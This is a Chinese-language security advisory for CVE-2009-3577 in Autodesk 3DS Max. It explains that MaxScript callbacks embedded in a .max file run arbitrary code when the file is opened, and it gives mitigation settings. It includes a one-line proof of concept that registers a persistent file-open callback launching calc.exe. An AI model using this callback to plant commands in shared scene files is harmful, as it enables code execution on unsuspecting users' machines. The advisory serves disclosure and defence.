发布日期：2009-11-23
更新日期：2009-11-24

受影响系统：

Autodesk 3DS Max 9
Autodesk 3DS Max 8
Autodesk 3DS Max 7
Autodesk 3DS Max 6
Autodesk 3DS Max 2010
Autodesk 3DS Max 2009
Autodesk 3DS Max 2008

描述：

---

BUGTRAQ  ID: 36634
CVE ID: CVE-2009-3577

Autodesk 3D Max是在视频游戏、电影、多媒体和web内容开发中广泛应用的建模和动画软件包。

Autodesk 3D Max提供了内嵌的脚本语言MaxScript。3D Max允许用户将MaxScript绑定到应用回调上，如果用户受骗打开了嵌入有MaxScript应用回调的.max文件，就会导致执行任意代码。

<*来源：Sebastian Tello
  
  链接：http://marc.info/?l=bugtraq&m=125900816618677&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/-----
     callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")")
id:#mbLoadCallback persistent:true  
    
- -----/

建议：

---

临时解决方法：

* 通过以下步骤禁止自动加载嵌入的MaxScript：

   . 找到Customize menu > Preferences > Preference Settings dialog > MAXScript
   . 清除Load/Save Scene Scripts
   . 清除Load/Save Persistent Globals

厂商补丁：

Autodesk
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://usa.autodesk.com/adsk/servlet/home?siteID=123112&id=129446

浏览次数：2548
严重程度：0（网友投票）